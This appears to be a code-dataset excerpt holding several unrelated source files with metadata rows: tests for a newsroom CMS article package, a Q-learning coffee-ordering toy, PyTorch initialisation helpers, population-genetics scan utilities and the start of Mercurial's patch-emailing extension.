'http://xml.zeit.de/online/2007/01/Somalia')
self.info = zeit.cms.workflow.interfaces.IPublishInfo(self.article)
sm = zope.component.getSiteManager()
self.orig_validator = sm.adapters.lookup(
(zeit.content.article.interfaces.IArticle,),
zeit.edit.interfaces.IValidator)
self.validator = mock.Mock()
zope.component.provideAdapter(
self.validator,
adapts=(zeit.content.article.interfaces.IArticle,),
provides=zeit.edit.interfaces.IValidator)
def tearDown(self):
zope.component.getSiteManager().unregisterAdapter(
required=(zeit.content.article.interfaces.IArticle,),
provided=zeit.edit.interfaces.IValidator)
zope.component.provideAdapter(
self.orig_validator,
adapts=(zeit.content.article.interfaces.IArticle,),
provides=zeit.edit.interfaces.IValidator)
super(WorkflowTest, self).tearDown()
def test_not_urgent_cannot_publish(self):
self.assertFalse(self.info.urgent)
self.assertEqual(CAN_PUBLISH_ERROR, self.info.can_publish())
self.assertFalse(self.validator.called)
def test_validation_passes_can_publish(self):
self.info.urgent = True
self.validator().status = None
self.assertEqual(CAN_PUBLISH_SUCCESS, self.info.can_publish())
self.validator.assert_called_with(self.article)
def test_validation_fails_cannot_publish(self):
self.info.urgent = True
self.validator().status = zeit.edit.rule.ERROR
self.validator().messages = []
self.assertEqual(CAN_PUBLISH_ERROR, self.info.can_publish())
self.validator.assert_called_with(self.article)
class DivisionTest(zeit.content.article.testing.FunctionalTestCase):
# See bug #9495
def get_article_with_paras(self):
article = self.get_article()
factory = self.get_factory(article, 'p')
for _ in range(10):
factory()
return article
def test_article_should_not_mangle_divisions_on_create(self):
article = self.get_article_with_paras()
self.assertEqual(1, len(article.xml.body.findall('division')))
def test_article_should_not_mangle_divisions_on_add_to_repository(self):
article = self.get_article_with_paras()
self.repository['article'] = article
self.assertEqual(
1, len(self.repository['article'].xml.body.findall('division')))
def test_article_should_not_mangle_divisions_on_checkin(self):
from zeit.cms.checkout.helper import checked_out
article = self.get_article_with_paras()
self.repository['article'] = article
with checked_out(self.repository['article']):
pass
self.assertEqual(
1, len(self.repository['article'].xml.body.findall('division')))
def test_article_without_division_should_get_them_on_checkin(self):
from zeit.cms.checkout.helper import checked_out
article = self.get_article_with_paras()
# mangle the xml
for p in article.xml.body.division.getchildren():
article.xml.body.append(p)
article.xml.body.remove(article.xml.body.division)
self.repository['article'] = article
with checked_out(self.repository['article']):
pass
self.assertEqual(
2, len(self.repository['article'].xml.body.findall('division')))
class MainImageTest(zeit.content.article.testing.FunctionalTestCase):
def test_main_image_is_none_if_first_body_is_empty(self):
article = self.get_article()
self.assertEqual(None, article.main_image)
def test_main_image_is_none_if_first_block_is_not_an_image(self):
article = self.get_article()
self.get_factory(article, 'p')()
self.assertEqual(None, article.main_image)
def test_main_image_is_none_if_first_block_is_an_empty_image(self):
article = self.get_article()
self.get_factory(article, 'image')()
self.assertEqual(None, article.main_image)
def test_main_image_is_returned_if_first_block_contains_one(self):
article = self.get_article()
block = self.get_factory(article, 'image')()
image = zeit.cms.interfaces.ICMSContent(
'http://xml.zeit.de/2006/DSC00109_2.JPG')
block.references = block.references.create(image)
self.assertEqual(image, article.main_image.target)
def test_setting_main_image_is_reflected_inside_body(self):
article = self.get_article()
block = self.get_factory(article, 'image')()
image = zeit.cms.interfaces.ICMSContent(
'http://xml.zeit.de/2006/DSC00109_2.JPG')
article.main_image = article.main_image.create(image)
block = article.body.values()[0]
self.assertEqual(image, block.references.target)
self.assertFalse(block.is_empty)
def test_setting_main_image_works_if_body_does_not_start_with_image(self):
article = self.get_article()
image = zeit.cms.interfaces.ICMSContent(
'http://xml.zeit.de/2006/DSC00109_2.JPG')
article.main_image = article.main_image.create(image)
block = article.body.values()[0]
self.assertEqual(image, block.references.target)
class NormalizeQuotes(zeit.content.article.testing.FunctionalTestCase):
def test_normalize_body(self):
article = self.get_article()
p = self.get_factory(article, 'p')()
p.text = '“up” and „down‟ and «around»'
self.repository['article'] = article
with zeit.cms.checkout.helper.checked_out(
self.repository['article']) as co:
block = co.body.values()[0]
self.assertEqual('"up" and "down" and "around"', block.text)
def test_normalize_teaser(self):
article = self.get_article()
article.teaserTitle = u'“up” and „down‟ and «around»'
self.repository['article'] = article
with zeit.cms.checkout.helper.checked_out(
self.repository['article']) as co:
self.assertEqual('"up" and "down" and "around"', co.teaserTitle)
class LayoutHeaderByArticleTemplate(
zeit.content.article.testing.FunctionalTestCase):
def test_header_layout_should_determine_header_module_visibility(self):
article = self.get_article()
article.template = u'column'
article.header_layout = u'default'
source = zeit.content.article.source.ArticleTemplateSource().factory
self.assertTrue(source.allow_header_module(article))
class DefaultTemplateByContentType(
zeit.content.article.testing.FunctionalTestCase):
def test_config_should_define_default_template_for_context(self):
article = self.get_article()
source = zeit.content.article.source.ArticleTemplateSource().factory
has_default = source._provides_default(
article,
['zeit.cms.section.interfaces.IZONContent'])
self.assertFalse(has_default)
zope.interface.alsoProvides(article,
zeit.cms.section.interfaces.IZONContent)
has_default = source._provides_default(
article,
['zeit.cms.section.interfaces.IZONContent'])
self.assertTrue(has_default)
article = self.get_article()
zope.interface.alsoProvides(article,
zeit.magazin.interfaces.IZMOContent)
has_default = source._provides_default(
article,
['zeit.cms.section.interfaces.IZONContent',
'zeit.magazin.interfaces.IZMOContent'])
self.assertTrue(has_default)
def test_config_should_define_generic_default_for_context(self):
source = zeit.content.article.source.ArticleTemplateSource().factory
self.assertEquals(
('article', 'inside'),
source._get_generic_default())
def test_config_should_provide_defaults(self):
article = self.get_article()
source = zeit.content.article.source.ArticleTemplateSource().factory
zope.interface.alsoProvides(article,
zeit.cms.section.interfaces.IZONContent)
self.assertEquals(
('article', 'default'),
source.get_default_template(article))
article = self.get_article()
source = zeit.content.article.source.ArticleTemplateSource().factory
zope.interface.alsoProvides(article,
zeit.magazin.interfaces.IZMOContent)
self.assertEquals(
('short', ''),
source.get_default_template(article))
article = self.get_article()
self.assertEquals(
('article', 'inside'),
source.get_default_template(article))
def test_article_should_have_default_template_on_checkout(self):
article = self.get_article()
self.repository['article'] = article
with zeit.cms.checkout.helper.checked_out(self.repository['article']):
pass
self.assertEquals('article', self.repository['article'].template)
self.assertEquals('default', self.repository['article'].header_layout)
def test_checkout_should_not_change_template_if_already_set(self):
article = self.get_article()
article.template = u'column'
article.header_layout = u'heiter'
self.repository['article'] = article
with zeit.cms.checkout.helper.checked_out(self.repository['article']):
pass
self.assertEquals('column', self.repository['article'].template)
self.assertEquals('heiter', self.repository['article'].header_layout)
def test_checkout_should_assign_default_if_current_value_invalid(self):
article = self.get_article()
article.template = u'nonexistent'
self.repository['article'] = article
with zeit.cms.checkout.helper.checked_out(self.repository['article']):
pass
self.assertEquals('article', self.repository['article'].template)
def test_article_should_have_default_variant_name_on_checkout(self):
article = self.get_article()
article._create_image_block_in_front()
self.repository['article'] = article
with zeit.cms.checkout.helper.checked_out(self.repository['article']):
pass
self.assertEquals(
'original', self.repository['article'].main_image_variant_name)
def test_checkout_should_not_change_variant_name_if_already_set(self):
article = self.get_article()
article._create_image_block_in_front()
article.main_image_variant_name = 'wide'
self.repository['article'] = article
with zeit.cms.checkout.helper.checked_out(self.repository['article']):
pass
self.assertEquals(
'wide', self.repository['article'].main_image_variant_name)
def test_changing_template_should_set_default_header(self):
article = self.get_article()
article._create_image_block_in_front()
article.template = u'column'
self.repository['article'] = article
with zeit.cms.checkout.helper.checked_out(
self.repository['article']) as article:
self.assertEqual(None, article.header_layout)
article.template = u'article'
zope.event.notify(zope.lifecycleevent.ObjectModifiedEvent(
article, zope.lifecycleevent.Attributes(
zeit.content.article.interfaces.IArticle, 'template')))
self.assertEqual('default', article.header_layout)
class AccessRestrictsAMPandFBIA(
zeit.content.article.testing.FunctionalTestCase):
def setUp(self):
super(AccessRestrictsAMPandFBIA, self).setUp()
self.repository['article'] = self.get_article()
self.article = self.repository['article']
def notify_modified(self, article, field='access'):
zope.event.notify(zope.lifecycleevent.ObjectModifiedEvent(
article, zope.lifecycleevent.Attributes(
zeit.cms.content.interfaces.ICommonMetadata, field)))
def test_setting_access_to_abo_or_registration_disables_amp_and_fbia(self):
with zeit.cms.checkout.helper.checked_out(self.article) as article:
article.is_amp = True
article.is_instant_article = True
article.access = u'abo'
self.notify_modified(article)
self.assertEqual(False, article.is_amp)
self.assertEqual(False, article.is_instant_article)
article.is_amp = True
article.is_instant_article = True
article.access = u'registration'
self.notify_modified(article)
self.assertEqual(False, article.is_amp)
self.assertEqual(False, article.is_instant_article)
def test_setting_access_to_free_does_not_change_is_amp_and_fbia(self):
with zeit.cms.checkout.helper.checked_out(self.article) as article:
article.is_amp = True
article.is_instant_article = True
article.access = u'free'
self.notify_modified(article)
self.assertEqual(True, article.is_amp)
self.assertEqual(True, article.is_instant_article)
def test_do_not_change_is_amp_if_access_is_missing(self):
"""For bw-compat old articles without access are treated as free."""
with zeit.cms.checkout.helper.checked_out(self.article) as article:
article.is_amp = True
article.is_instant_article = True
article.access = None
self.notify_modified(article)
self.assertEqual(True, article.is_amp)
self.assertEqual(True, article.is_instant_article)
def test_only_change_is_amp_if_access_was_changed(self):
with zeit.cms.checkout.helper.checked_out(self.article) as article:
article.access = u'abo'
article.is_amp = True
article.is_instant_article = True
article.year = 2016
self.notify_modified(article, 'year')
self.assertEqual(True, article.is_amp)
self.assertEqual(True, article.is_instant_article)
class ArticleXMLReferenceUpdate(
zeit.content.article.testing.FunctionalTestCase):
def test_writes_genre_as_attribute(self):
self.repository['article'] = self.get_article()
with zeit.cms.checkout.helper.checked_out(
self.repository['article']) as co:
co.genre = u'nachricht'
reference = zope.component.queryAdapter(
self.repository['article'],
zeit.cms.content.interfaces.IXMLReference, name='related')
self.assertIn(
'genre="nachricht"',
lxml.etree.tostring(reference, pretty_print=True))
class ArticleElementReferencesTest(
zeit.content.article.testing.FunctionalTestCase):
def setUp(self):
super(ArticleElementReferencesTest, self).setUp()
self.article = self.get_article()
def create_empty_portraitbox_reference(self):
from zeit.content.article.edit.body import EditableBody
body = EditableBody(self.article, self.article.xml.body)
portraitbox_reference = body.create_item('portraitbox', 1)
portraitbox_reference._validate = mock.Mock()
return portraitbox_reference
def test_articles_element_references_iterates_over_references(self):
from zeit.content.portraitbox.portraitbox import Portraitbox
pbox = Portraitbox()
self.repository['pbox'] = pbox
ref = self.create_empty_portraitbox_reference()
ref.references = pbox
self.assertEqual([pbox], list(zeit.edit.interfaces.IElementReferences(
self.article)))
def test_empty_imagegroup_not_in_element_references(self):
from zeit.content.article.edit.body import EditableBody
self.repository['image-group'] = \
zeit.content.image.imagegroup.ImageGroup()
body = EditableBody(self.article, self.article.xml.body)
image_group = body.create_item('image', 3)
image_group.references = image_group.references.create(
self.repository['image-group'])
image_group._validate = mock.Mock()
self.repository['article_with_empty_ref'] = self.article
self.assertEqual([], list(zeit.edit.interfaces.IElementReferences(
self.repository['article_with_empty_ref'])))
def test_articles_element_references_is_empty_if_no_references_are_set(
self):
self.assertEqual([], list(zeit.edit.interfaces.IElementReferences(
self.article)))
def test_articles_element_references_is_empty_if_empty_reference_is_set(
self):
self.create_empty_portraitbox_reference()
self.assertEqual([], list(zeit.edit.interfaces.IElementReferences(
self.article)))
| bsd-3-clause | 5,625,414,481,670,800,000 | 40.635514 | 79 | 0.654714 | false |
minimalparts/Tutorials | RLcafe/caffe.py | 1 | 3150 | import numpy as np
import random
environment = {
0: [('buongiorno',[[1,0,1]]),('un caffè',[[7,0,1]])],
1: [('un caffè',[[2,0,0.8],[12,-2,0.2]])],
2: [('per favore',[[3,0,1]]),('EOS',[[5,-2,0.9],[6,-1,0.1]])],
3: [('EOS',[[4,-1,1]])],
7: [('per favore',[[8,0,1]]),('EOS',[[9,-3,1]])],
8: [('EOS',[[10,-2,0.9],[11,-1,0.1]])]
}
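# Each entry maps a state to its available (utterance, transitions) pairs, where
# every transition is [next_state, reward, probability] -- see get_next_state below.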
#index to actions
i_to_actions = {0: 'buongiorno', 1: 'un caffè', 2: 'per favore', 3: 'EOS'}
actions_to_i = {'buongiorno':0, 'un caffè':1, 'per favore':2, 'EOS':3}
#Initialising the Q matrix
q_matrix = []
for i in range(13):
q_matrix.append([0,0,0,0])
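# 13 states (0-12) by 4 actions, one column per utterance in actions_to_i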
exit_states = [4,5,6,9,10,11,12]
def get_possible_next_actions(cur_pos):
return environment[cur_pos]
def get_next_state(action):
word = action[0]
possible_states = action[1]
fate = {}
for p in possible_states:
s = p[0]
r = p[1]
l = p[2]
fate[s] = [r,l]
    next_state = np.random.choice(list(fate.keys()), 1, p=[v[1] for k, v in fate.items()])
reward = fate[next_state[0]][0]
#print(next_state[0],reward)
return next_state[0],reward
def game_over(cur_pos):
return cur_pos in exit_states
discount = 0.9
learning_rate = 0.1
for _ in range(500):
print("\nEpisode ", _ )
# get starting place
cur_pos = 0
# while goal state is not reached
episode_return = 0
while(not game_over(cur_pos)):
# get all possible next states from cur_step
possible_actions = get_possible_next_actions(cur_pos)
# select any one action randomly
action = random.choice(possible_actions)
word = action[0]
action_i = actions_to_i[word]
print(word)
# find the next state corresponding to the action selected
next_state,reward = get_next_state(action)
episode_return+=reward
# update the q_matrix
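        # Q-learning update: Q(s,a) += lr * (r + gamma * max_a' Q(s',a') - Q(s,a))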
        q_matrix[cur_pos][action_i] += learning_rate * (
            reward + discount * max(q_matrix[next_state]) - q_matrix[cur_pos][action_i])
print(cur_pos,q_matrix[cur_pos],next_state)
# go to next state
cur_pos = next_state
print("Reward:",episode_return,"\n")
print(np.array(q_matrix).reshape(13,4))
print("Training done...")
print("\n***\nTesting...\n***\n")
# get starting place
cur_pos = 0
episode_return = 0
while(not game_over(cur_pos)):
# get all possible next states from cur_step
possible_actions = get_possible_next_actions(cur_pos)
#print(possible_actions)
# select the *possible* action with highest Q value
action = None
if np.linalg.norm(q_matrix[cur_pos]) == 0:
action = random.choice(possible_actions)
else:
action = actions_to_i[possible_actions[0][0]]
c = 0
action_i = c
for a in possible_actions:
a_i = actions_to_i[a[0]]
if q_matrix[cur_pos][a_i] > q_matrix[cur_pos][action]:
action = a_i
action_i = c
c+=1
action = possible_actions[action_i]
print(action[0])
next_state,reward = get_next_state(action)
episode_return+=reward
cur_pos = next_state
print("Return:",episode_return)
| mit | -4,122,450,842,618,977,300 | 30.148515 | 161 | 0.586459 | false |
2prime/DeepLab | NMResNet/init.py | 1 | 2336 | '''
MSRA INIT
net parameter initialization.
He K, Zhang X, Ren S, et al.
Delving Deep into Rectifiers: Surpassing Human-Level Performance on ImageNet Classification,
arxiv:1502.01852
Reference:http://damon.studio/2017/06/11/WeightsInitialization/
'''
import torch.nn as nn
import torch.nn.init as init
'''
usage:
class Net(nn.Module):
def __init__(*parameters):
super(Net, self).__init__()
...parameter setting
msra_init(self)
def forward(*para):
...
'''
def msra_init(net):
'''Init layer parameters.'''
for m in net.modules():
if isinstance(m, nn.Conv2d):
init.kaiming_normal(m.weight)
# Modified by lzh @ 201707251408:
# <<< Old:
# if m.bias:
# >>> New:
if m.bias is not None:
init.constant(m.bias, 0)
elif isinstance(m, nn.BatchNorm2d):
init.constant(m.weight, 1)
init.constant(m.bias, 0)
elif isinstance(m, nn.Linear):
init.normal(m.weight, std=1e-3)
# Modified by lzh @ 201707241734:
# <<< Old:
# if m.bias:
# >>> New:
if m.bias is not None:
# --- End
init.constant(m.bias, 0)
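# Hypothetical usage sketch (MyNet stands for any torch.nn.Module defined elsewhere):
#   net = MyNet()
#   msra_init(net)   # He init for convs, constants for BatchNorm, small normal for Linear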
# Added by lzh @ 201707251404:
def xavier_init(net):
'''Init layer parameters.'''
for m in net.modules():
if isinstance(m, nn.Conv2d):
init.xavier_normal(m.weight)
if m.bias is not None:
init.constant(m.bias, 0)
elif isinstance(m, nn.BatchNorm2d):
init.constant(m.weight, 1)
init.constant(m.bias, 0)
elif isinstance(m, nn.Linear):
init.normal(m.weight, std=1e-3)
if m.bias is not None:
init.constant(m.bias, 0)
def gauss_init(net):
'''Init layer parameters.'''
for m in net.modules():
if isinstance(m, nn.Conv2d):
            init.normal(m.weight, 0.0, 0.01)
if m.bias is not None:
init.constant(m.bias, 0)
elif isinstance(m, nn.BatchNorm2d):
init.constant(m.weight, 1)
init.constant(m.bias, 0)
elif isinstance(m, nn.Linear):
init.normal(m.weight, std=1e-3)
if m.bias is not None:
init.constant(m.bias, 0)
# --- End | mit | -4,048,549,762,413,042,700 | 28.961538 | 92 | 0.536387 | false |
broadinstitute/cms | cms/power/power_func.py | 1 | 8625 | ## functions for analyzing empirical/simulated CMS output
## last updated 09.14.2017 [email protected]
import matplotlib as mp
mp.use('agg')
import matplotlib.pyplot as plt
import numpy as np
import math
from scipy.stats import percentileofscore
import scipy.stats  # scipy.stats.norm.sf is used in plotManhattan
###################
## DEFINE SCORES ##
###################
def write_master_likesfile(writefilename, model, selpop, freq,basedir, miss = "neut",):
'''adapted from run_likes_func.py'''
writefile = open(writefilename, 'w')
for score in ['ihs', 'nsl', 'delihh']:
hitlikesfilename = basedir + model + "/" + score + "/likes_sel" + str(selpop) + "_" + str(freq) + "_causal.txt"#_smoothed.txt"
misslikesfilename = basedir + model + "/" + score + "/likes_sel" + str(selpop) + "_" + str(freq) + "_" + miss + ".txt"#"_smoothed.txt"
#assert(os.path.isfile(hitlikesfilename) and os.path.isfile(misslikesfilename))
writefile.write(hitlikesfilename + "\n" + misslikesfilename + "\n")
for score in ['xpehh', 'fst', 'deldaf']:
hitlikesfilename = basedir + model + "/" + score + "/likes_sel" + str(selpop) + "_choose_" + str(freq) + "_causal.txt"#_smoothed.txt"
misslikesfilename = basedir + model + "/" + score + "/likes_sel" + str(selpop) + "_choose_" + str(freq) + "_" + miss + ".txt"#"_smoothed.txt"
#assert(os.path.isfile(hitlikesfilename) and os.path.isfile(misslikesfilename))
writefile.write(hitlikesfilename + "\n" + misslikesfilename + "\n")
writefile.close()
print("wrote to: " + writefilename)
return
###############
## REGION ID ##
###############
def get_window(istart, physpos, scores, windowlen = 100000):
window_scores = [scores[istart]]
startpos = physpos[istart]
pos = startpos
iscore = istart
while pos < (startpos + windowlen):
iscore += 1
if iscore >= len(scores):
break
window_scores.append(scores[iscore])
pos = physpos[iscore]
#print(str(pos) + " " + str(startpos))
return window_scores
def check_outliers(scorelist, cutoff = 3):
numscores = len(scorelist)
outliers = [item for item in scorelist if item > cutoff]
numoutliers = len(outliers)
percentage = (float(numoutliers) / float(numscores)) * 100.
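    # e.g. scorelist=[1, 2, 4] with cutoff=3 -> 1 outlier out of 3 scores -> 33.3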
return percentage
def check_rep_windows(physpos, scores, windowlen = 100000, cutoff = 3, totalchrlen=1000000):
'''
    Note: a previous implementation produced false positives whenever a small uptick
    occurred right at the edge of the replicate; windows are now only counted while
    their full length fits before the chromosome edge.
'''
#check window defined by each snp as starting point
rep_percentages = []
numSnps = len(physpos)
numWindows = 0
#get exhaustive windows and stop at chrom edge
for isnp in range(numSnps):
if physpos[isnp] + windowlen < totalchrlen:
numWindows +=1
else:
#print(str(physpos[isnp]) + "\t")
break
for iPos in range(numWindows):
window_scores = get_window(iPos, physpos, scores, windowlen)
percentage = check_outliers(window_scores, cutoff)
rep_percentages.append(percentage)
return rep_percentages
def merge_windows(chrom_signif, windowlen, maxGap = 100000):
print('should implement this using bedtools')
starts, ends = [], []
contig = False
this_windowlen = 0
starting_pos = 0
if len(chrom_signif) > 0:
for i_start in range(len(chrom_signif) - 1):
if not contig:
starts.append(chrom_signif[i_start])
this_windowlen = windowlen #unmerged, default
starting_pos = chrom_signif[i_start]
if ((chrom_signif[i_start] + this_windowlen) > chrom_signif[i_start + 1]): #contiguous
contig = True
this_windowlen = chrom_signif[i_start +1] + windowlen - starting_pos
#or, could also be contiguous in the situation where the next snp is not within this window because there doesn't exist such a snp
elif chrom_signif[i_start +1] >=(chrom_signif[i_start] + this_windowlen) and chrom_signif[i_start +1] < (chrom_signif[i_start] + maxGap):
contig = True
this_windowlen = chrom_signif[i_start +1] + windowlen - starting_pos
else:
contig = False
if not contig:
windowend = chrom_signif[i_start] + windowlen
ends.append(windowend)
if contig: #last region is overlapped by its predecssor
ends.append(chrom_signif[-1] + windowlen)
else:
starts.append(chrom_signif[-1])
ends.append(chrom_signif[-1] + windowlen)
assert len(starts) == len(ends)
return starts, ends
##########################
## POWER & SIGNIFICANCE ##
##########################
def calc_pr(all_percentages, threshhold):
numNeutReps_exceedThresh = 0
totalnumNeutReps = len(all_percentages)
for irep in range(totalnumNeutReps):
if len(all_percentages[irep]) != 0:
if max(all_percentages[irep]) > threshhold:
numNeutReps_exceedThresh +=1
numNeutReps_exceedThresh, totalnumNeutReps = float(numNeutReps_exceedThresh), float(totalnumNeutReps)
if totalnumNeutReps != 0:
pr = numNeutReps_exceedThresh / totalnumNeutReps
else:
pr = 0
print('ERROR; empty set')
return pr
def get_causal_rank(values, causal_val):
if np.isnan(causal_val):
return(float('nan'))
assert(causal_val in values)
cleanvals = []
for item in values:
if not np.isnan(item) and not np.isinf(item):
cleanvals.append(item)
values = cleanvals
values.sort()
values.reverse()
causal_rank = values.index(causal_val)
return causal_rank
def get_cdf_from_causal_ranks(causal_ranks):
numbins = max(causal_ranks) #? heuristic
counts, bins = np.histogram(causal_ranks, bins=numbins, normed = True) #doublecheck
cdf = np.cumsum(counts)
return bins, cdf
def get_pval(all_simscores, thisScore):
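    # assumes all_simscores is already sorted in ascending order (np.searchsorted
    # only gives a meaningful rank for sorted input)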
r = np.searchsorted(all_simscores,thisScore)
n = len(all_simscores)
pval = 1. - ((r + 1.) / (n + 1.))
if pval > 0:
#pval *= nSnps #Bonferroni
return pval
else:
#print("r: " +str(r) + " , n: " + str(n))
pval = 1. - (r/(n+1))
#pval *= nSnps #Bonferroni
return pval
###############
## VISUALIZE ##
###############
def quick_plot(ax, pos, val, ylabel,causal_index=-1):
ax.scatter(pos, val, s=.8)
if causal_index != -1:
ax.scatter(pos[causal_index], val[causal_index], color='r', s=4)
for tick in ax.yaxis.get_major_ticks():
tick.label.set_fontsize('6')
ax.set_ylabel(ylabel, fontsize='6')
#ax.set_xlim([0, 1500000]) #make flexible?
ax.yaxis.set_label_position('right')
#ax.set_ylim([min(val), max(val)])
return ax
def plot_dist(allvals, savefilename= "/web/personal/vitti/test.png", numBins=1000):
#print(allvals)
#get rid of nans and infs
#cleanvals = [item for item in allvals if not np.isnan(item)]
#allvals = cleanvals
allvals = np.array(allvals)
allvals = allvals[~np.isnan(allvals)]
allvals = allvals[~np.isinf(allvals)]
#allvals = list(allvals)
#print(allvals)
print("percentile for score = 10: " + str(percentileofscore(allvals, 10)))
print("percentile for score = 15: " + str(percentileofscore(allvals, 15)))
if len(allvals) > 0:
f, ax = plt.subplots(1)
ax.hist(allvals, bins=numBins)
plt.savefig(savefilename)
print('plotted to ' + savefilename)
return
def plotManhattan(ax, neut_rep_scores, emp_scores, chrom_pos, nSnps, maxSkipVal = 0, zscores = True):
#neut_rep_scores.sort()
#print('sorted neutral scores...')
lastpos = 0
for chrom in range(1,23):
ichrom = chrom-1
if ichrom%2 == 0:
plotcolor = "darkblue"
else:
plotcolor = "lightblue"
if zscores == True:
#http://stackoverflow.com/questions/3496656/convert-z-score-z-value-standard-score-to-p-value-for-normal-distribution-in?rq=1
#Z SCORE cf SG email 103116
#pvals = [get_pval(neut_rep_scores, item) for item in emp_scores[ichrom]]
pvalues = []
for item in emp_scores[ichrom]:
if item < maxSkipVal: #speed up this process by ignoring anything obviously insignificant
pval = 1
else:
#print('scipy')
#sys.exit()
pval = scipy.stats.norm.sf(abs(item))
pvalues.append(pval)
#else:
# pval = get_pval(neut_rep_scores, item)
#pvalues.append(pval)
print("calculated pvalues for chrom " + str(chrom))
chrom_pos = range(lastpos, lastpos + len(pvalues))
logtenpvals = [(-1. * math.log10(pval)) for pval in pvalues]
ax.scatter(chrom_pos, logtenpvals, color =plotcolor, s=.5)
lastpos = chrom_pos[-1]
else:
chrom_pos = range(lastpos, lastpos + len(emp_scores[ichrom]))
ax.scatter(chrom_pos, emp_scores[ichrom], color=plotcolor, s=.5)
lastpos = chrom_pos[-1]
return ax
def plotManhattan_extended(ax, emp_scores, chrom_pos, chrom):
''' makes a figure more like in Karlsson 2013 instead of Grossman 2013'''
ax.plot(chrom_pos, emp_scores, linestyle='None', marker=".", markersize=.3, color="black")
ax.set_ylabel('chr' + str(chrom), fontsize=6, rotation='horizontal')
labels = ax.get_yticklabels()
ax.set_yticklabels(labels, fontsize=6)
ax.set_axis_bgcolor('LightGray')
return ax
| bsd-2-clause | 7,845,082,051,252,510,000 | 34.9375 | 143 | 0.679072 | false |
vmg/hg-stable | hgext/patchbomb.py | 1 | 21405 | # patchbomb.py - sending Mercurial changesets as patch emails
#
# Copyright 2005-2009 Matt Mackall <[email protected]> and others
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
'''command to send changesets as (a series of) patch emails
The series is started off with a "[PATCH 0 of N]" introduction, which
describes the series as a whole.
Each patch email has a Subject line of "[PATCH M of N] ...", using the
first line of the changeset description as the subject text. The
message contains two or three body parts:
- The changeset description.
- [Optional] The result of running diffstat on the patch.
- The patch itself, as generated by :hg:`export`.
Each message refers to the first in the series using the In-Reply-To
and References headers, so they will show up as a sequence in threaded
mail and news readers, and in mail archives.
To configure other defaults, add a section like this to your
configuration file::
[email]
from = My Name <my@email>
to = recipient1, recipient2, ...
cc = cc1, cc2, ...
bcc = bcc1, bcc2, ...
reply-to = address1, address2, ...
Use ``[patchbomb]`` as configuration section name if you need to
override global ``[email]`` address settings.
Then you can use the :hg:`email` command to mail a series of
changesets as a patchbomb.
You can also either configure the method option in the email section
to be a sendmail compatible mailer or fill out the [smtp] section so
that the patchbomb extension can automatically send patchbombs
directly from the commandline. See the [email] and [smtp] sections in
hgrc(5) for details.
'''
import os, errno, socket, tempfile, cStringIO
import email.MIMEMultipart, email.MIMEBase
import email.Utils, email.Encoders, email.Generator
from mercurial import cmdutil, commands, hg, mail, patch, util
from mercurial import scmutil
from mercurial.i18n import _
from mercurial.node import bin
cmdtable = {}
command = cmdutil.command(cmdtable)
testedwith = 'internal'
def prompt(ui, prompt, default=None, rest=':'):
if default:
prompt += ' [%s]' % default
return ui.prompt(prompt + rest, default)
def introwanted(opts, number):
'''is an introductory message apparently wanted?'''
return number > 1 or opts.get('intro') or opts.get('desc')
def makepatch(ui, repo, patchlines, opts, _charsets, idx, total, numbered,
patchname=None):
desc = []
node = None
body = ''
for line in patchlines:
if line.startswith('#'):
if line.startswith('# Node ID'):
node = line.split()[-1]
continue
if line.startswith('diff -r') or line.startswith('diff --git'):
break
desc.append(line)
if not patchname and not node:
raise ValueError
if opts.get('attach') and not opts.get('body'):
body = ('\n'.join(desc[1:]).strip() or
'Patch subject is complete summary.')
body += '\n\n\n'
if opts.get('plain'):
while patchlines and patchlines[0].startswith('# '):
patchlines.pop(0)
if patchlines:
patchlines.pop(0)
while patchlines and not patchlines[0].strip():
patchlines.pop(0)
ds = patch.diffstat(patchlines, git=opts.get('git'))
if opts.get('diffstat'):
body += ds + '\n\n'
addattachment = opts.get('attach') or opts.get('inline')
if not addattachment or opts.get('body'):
body += '\n'.join(patchlines)
if addattachment:
msg = email.MIMEMultipart.MIMEMultipart()
if body:
msg.attach(mail.mimeencode(ui, body, _charsets, opts.get('test')))
p = mail.mimetextpatch('\n'.join(patchlines), 'x-patch',
opts.get('test'))
binnode = bin(node)
# if node is mq patch, it will have the patch file's name as a tag
if not patchname:
patchtags = [t for t in repo.nodetags(binnode)
if t.endswith('.patch') or t.endswith('.diff')]
if patchtags:
patchname = patchtags[0]
elif total > 1:
patchname = cmdutil.makefilename(repo, '%b-%n.patch',
binnode, seqno=idx,
total=total)
else:
patchname = cmdutil.makefilename(repo, '%b.patch', binnode)
disposition = 'inline'
if opts.get('attach'):
disposition = 'attachment'
p['Content-Disposition'] = disposition + '; filename=' + patchname
msg.attach(p)
else:
msg = mail.mimetextpatch(body, display=opts.get('test'))
flag = ' '.join(opts.get('flag'))
if flag:
flag = ' ' + flag
subj = desc[0].strip().rstrip('. ')
if not numbered:
subj = '[PATCH%s] %s' % (flag, opts.get('subject') or subj)
else:
tlen = len(str(total))
subj = '[PATCH %0*d of %d%s] %s' % (tlen, idx, total, flag, subj)
msg['Subject'] = mail.headencode(ui, subj, _charsets, opts.get('test'))
msg['X-Mercurial-Node'] = node
return msg, subj, ds
emailopts = [
('', 'body', None, _('send patches as inline message text (default)')),
('a', 'attach', None, _('send patches as attachments')),
('i', 'inline', None, _('send patches as inline attachments')),
('', 'bcc', [], _('email addresses of blind carbon copy recipients')),
('c', 'cc', [], _('email addresses of copy recipients')),
('', 'confirm', None, _('ask for confirmation before sending')),
('d', 'diffstat', None, _('add diffstat output to messages')),
('', 'date', '', _('use the given date as the sending date')),
('', 'desc', '', _('use the given file as the series description')),
('f', 'from', '', _('email address of sender')),
('n', 'test', None, _('print messages that would be sent')),
('m', 'mbox', '', _('write messages to mbox file instead of sending them')),
('', 'reply-to', [], _('email addresses replies should be sent to')),
('s', 'subject', '', _('subject of first message (intro or single patch)')),
('', 'in-reply-to', '', _('message identifier to reply to')),
('', 'flag', [], _('flags to add in subject prefixes')),
('t', 'to', [], _('email addresses of recipients'))]
@command('email',
[('g', 'git', None, _('use git extended diff format')),
('', 'plain', None, _('omit hg patch header')),
('o', 'outgoing', None,
_('send changes not found in the target repository')),
('b', 'bundle', None, _('send changes not in target as a binary bundle')),
('', 'bundlename', 'bundle',
_('name of the bundle attachment file'), _('NAME')),
('r', 'rev', [], _('a revision to send'), _('REV')),
('', 'force', None, _('run even when remote repository is unrelated '
'(with -b/--bundle)')),
('', 'base', [], _('a base changeset to specify instead of a destination '
'(with -b/--bundle)'), _('REV')),
('', 'intro', None, _('send an introduction email for a single patch')),
] + emailopts + commands.remoteopts,
_('hg email [OPTION]... [DEST]...'))
